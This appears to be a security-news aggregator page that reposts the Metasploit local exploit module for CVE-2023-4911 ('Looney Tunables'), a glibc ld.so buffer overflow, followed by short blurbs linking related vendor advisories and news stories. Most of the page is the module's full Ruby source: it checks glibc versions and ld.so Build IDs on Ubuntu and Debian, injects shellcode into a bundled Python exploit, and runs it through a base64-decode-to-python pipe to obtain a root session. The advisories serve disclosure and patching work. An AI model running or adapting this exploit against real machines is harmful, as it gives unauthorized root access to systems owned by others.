Security
Headlines
HeadlinesLatestCVEs

Headline

Glibc Tunables Privilege Escalation

A buffer overflow exists in the GNU C Library’s dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. It has been dubbed Looney Tunables. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when launching binaries with SUID permission to execute code in the context of the root user. This Metasploit module targets glibc packaged on Ubuntu and Debian. Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911 however this module does not target them.

Packet Storm
#ubuntu#linux#debian#git#buffer_overflow#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  # includes: is_root?  include Msf::Post::Linux::Priv  # includes: kernel_release  include Msf::Post::Linux::Kernel  # include: get_sysinfo  include Msf::Post::Linux::System  # includes writable?, upload_file, upload_and_chmodx, exploit_data, cd  include Msf::Post::File  # includes register_files_for_cleanup  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  BUILD_IDS = {    '69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,    '3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,    'a99db3715218b641780b04323e4ae5953d68a927' => 561,    'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,    '61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,    '9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,    'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,    '956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322  }  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)',        'Description' => %q{          A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES          environment variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when          launching binaries with SUID permission to execute code in the context of the root user.          This module targets glibc packaged on Ubuntu and Debian. The specific glibc versions this module targets are:          Ubuntu:          2.35-0ubuntu3.4 > 2.35          2.37-0ubuntu2.1 > 2.37          2.38-1ubuntu6 > 2.38          Debian:          2.31-13-deb11u7 > 2.31          2.36-9-deb12u3 > 2.36          Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911          however this module does not target them.        },        'Author' => [          'Qualys Threat Research Unit', # discovery          'blasty <[email protected]>', # PoC          'jheysel-r7' # msf module        ],        'References' => [          ['CVE', '2023-4911'],          ['URL', 'https://haxx.in/files/gnu-acme.py'],          ['URL', 'https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt'],          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2023-4911'],          ['URL', 'https://ubuntu.com/security/CVE-2023-4911']        ],        'License' => MSF_LICENSE,        'Platform' => [ 'linux', 'unix' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'DefaultTarget' => 0,        'DefaultOptions' => {          'PrependSetresgid' => true,          'PrependSetresuid' => true,          'WfsDelay' => 600        },        'DisclosureDate' => '2023-10-03',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_advanced_options([      OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])    ])  end  def find_exec_program    %w[python python3].select(&method(:command_exists?)).first  rescue StandardError => e    fail_with(Failure::Unknown, "An error occurred finding a version of python to use: #{e.message}")  end  def check    glibc_version = cmd_exec('ldd --version')&.scan(/ldd\s+\(\w+\s+GLIBC\s+(\S+)\)/)&.flatten&.first    return CheckCode::Unknown('Could not get the version of glibc') unless glibc_version    sysinfo = get_sysinfo    case sysinfo[:distro]    when 'ubuntu'      # Ubuntu's version looks like: 2.35-0ubuntu3.4. The following massaging is necessary for Rex::Version compatibility      test_version = glibc_version.gsub(/-\d+ubuntu/, '.')      if Rex::Version.new(test_version).between?(Rex::Version.new('2.35'), Rex::Version.new('2.35.3.4')) ||         Rex::Version.new(test_version).between?(Rex::Version.new('2.37'), Rex::Version.new('2.37.2.1')) ||         Rex::Version.new(test_version).between?(Rex::Version.new('2.38'), Rex::Version.new('2.38.6'))        return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")      end    when 'debian'      # Debian's version looks like: 2.36-9+deb12u1. The following massaging is necessary for Rex::Version compatibility      test_version = glibc_version.gsub(/\+deb/, '.').gsub(/u/, '.').gsub('-', '.')      if Rex::Version.new(test_version).between?(Rex::Version.new('2.31'), Rex::Version.new('2.31.13.11.7')) ||         Rex::Version.new(test_version).between?(Rex::Version.new('2.36'), Rex::Version.new('2.36.9.12.3'))        return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")      end    else      return CheckCode::Unknown('The module has not been tested against this Linux distribution')    end    CheckCode::Safe("The glibc version (#{glibc_version}) found on the target does not appear to be vulnerable")  end  def check_ld_so_build_id    # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so    if !command_exists?('file')      print_warning('Unable to locate the `file` command ti  order to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')      return    end    file_cmd_output = ''    # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not    # defined on the path like it is on Debian. Also Ubuntu doesn't have ldconfig install by default.    sysinfo = get_sysinfo    case sysinfo[:distro]    when 'ubuntu'      if command_exists?('ldconfig')        file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")')      end    when 'debian'      file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"')    else      fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')    end    if file_cmd_output =~ /BuildID\[.+\]=(\w+),/      build_id = Regexp.last_match(1)      if BUILD_IDS.keys.include?(build_id)        print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")      else        fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")      end    else      print_warning('Unable to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')    end  end  def exploit    fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?    python_binary = find_exec_program    fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary    vprint_status("Using '#{python_binary}' to run the exploit")    check_ld_so_build_id    # The python script assumes the working directory is the one we can write to.    cd(datastore['WritableDir'])    shell_code = payload.encoded.unpack('H*').first    exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py')    exploit_data = exploit_data.gsub('METASPLOIT_SHELL_CODE', shell_code)    exploit_data = exploit_data.gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))    # If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully    output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")    if output.blank?      print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')    else      print_line(output)    end  endend

Related news

Understanding the Red Hat security impact scale

Red Hat uses a four-point impact scale to classify security issues affecting our products. Have you ever asked yourself what it takes and what the requirements are for each point of the scale? We will talk through the highlights of our process in this article.Is this a CVE?First and foremost, what is a CVE? Short for Common Vulnerabilities and Exposures, it is a list of publicly disclosed computer security flaws. Learn more in this Red Hat post.To receive a severity rating, the issue needs to be a CVE. But what does it take to be a CVE? In order to warrant a CVE ID, a vulnerability has to comp

New Glibc Flaw Grants Attackers Root Access on Major Linux Distros

Malicious local attackers can obtain full root access on Linux machines by taking advantage of a newly disclosed security flaw in the GNU C library (aka glibc). Tracked as CVE-2023-6246, the heap-based buffer overflow vulnerability is rooted in glibc's __vsyslog_internal() function, which is used by syslog() and vsyslog() for system logging purposes. It's said to have been accidentally

Red Hat Security Advisory 2024-0033-03

Red Hat Security Advisory 2024-0033-03 - An update for redhat-release-virtualization-host and redhat-virtualization-host is now available for Red Hat Virtualization 4 for Red Hat Enterprise Linux 8.

Kinsing Crypto Malware Targets Linux Systems via Apache ActiveMQ Flaw

By Deeba Ahmed Patches for all affected versions of Apache ActiveMQ have been released, and clients are strongly advised to upgrade their systems. This is a post from HackRead.com Read the original post: Kinsing Crypto Malware Targets Linux Systems via Apache ActiveMQ Flaw

glibc ld.so Local Privilege Escalation

Dubbed Looney Tunables, Qualys discovered a buffer overflow vulnerability in the glibc dynamic loader's processing of the GLIBC_TUNABLES environment variable. This vulnerability was introduced in April 2021 (glibc 2.34) by commit 2ed18c.

Red Hat Security Advisory 2023-5455-01

Red Hat Security Advisory 2023-5455-01 - The glibc packages provide the standard C libraries, POSIX thread libraries, standard math libraries, and the name service cache daemon used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly. Issues addressed include buffer overflow, privilege escalation, and use-after-free vulnerabilities.

Red Hat Security Advisory 2023-5453-01

Red Hat Security Advisory 2023-5453-01 - The glibc packages provide the standard C libraries, POSIX thread libraries, standard math libraries, and the name service cache daemon used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly. Issues addressed include buffer overflow, privilege escalation, and use-after-free vulnerabilities.

Red Hat Security Advisory 2023-5454-01

Red Hat Security Advisory 2023-5454-01 - The glibc packages provide the standard C libraries, POSIX thread libraries, standard math libraries, and the name service cache daemon used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly. Issues addressed include buffer overflow and privilege escalation vulnerabilities.

Gentoo Linux Security Advisory 202310-03

Gentoo Linux Security Advisory 202310-3 - Multiple vulnerabilities in glibc could result in Local Privilege Escalation. Versions greater than or equal to 2.37-r7 are affected.

Ubuntu Security Notice USN-6409-1

Ubuntu Security Notice 6409-1 - It was discovered that the GNU C Library incorrectly handled the GLIBC_TUNABLES environment variable. An attacker could possibly use this issue to perform a privilege escalation attack. It was discovered that the GNU C Library incorrectly handled certain DNS responses when the system was configured in no-aaaa mode. A remote attacker could possibly use this issue to cause the GNU C Library to crash, resulting in a denial of service. This issue only affected Ubuntu 23.04.

Debian Security Advisory 5514-1

Debian Linux Security Advisory 5514-1 - The Qualys Research Labs discovered a buffer overflow in the dynamic loader's processing of the GLIBC_TUNABLES environment variable. An attacker can exploit this flaw for privilege escalation.

Looney Tunables: New Linux Flaw Enables Privilege Escalation on Major Distributions

A new Linux security vulnerability dubbed Looney Tunables has been discovered in the GNU C library's ld.so dynamic loader that, if successfully exploited, could lead to a local privilege escalation and allow a threat actor to gain root privileges. Tracked as CVE-2023-4911 (CVSS score: 7.8), the issue is a buffer overflow that resides in the dynamic loader's processing of the GLIBC_TUNABLES

CVE-2023-4911: Looney Tunables – Local Privilege Escalation in the glibc’s ld.so – Qualys Security Blog

A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution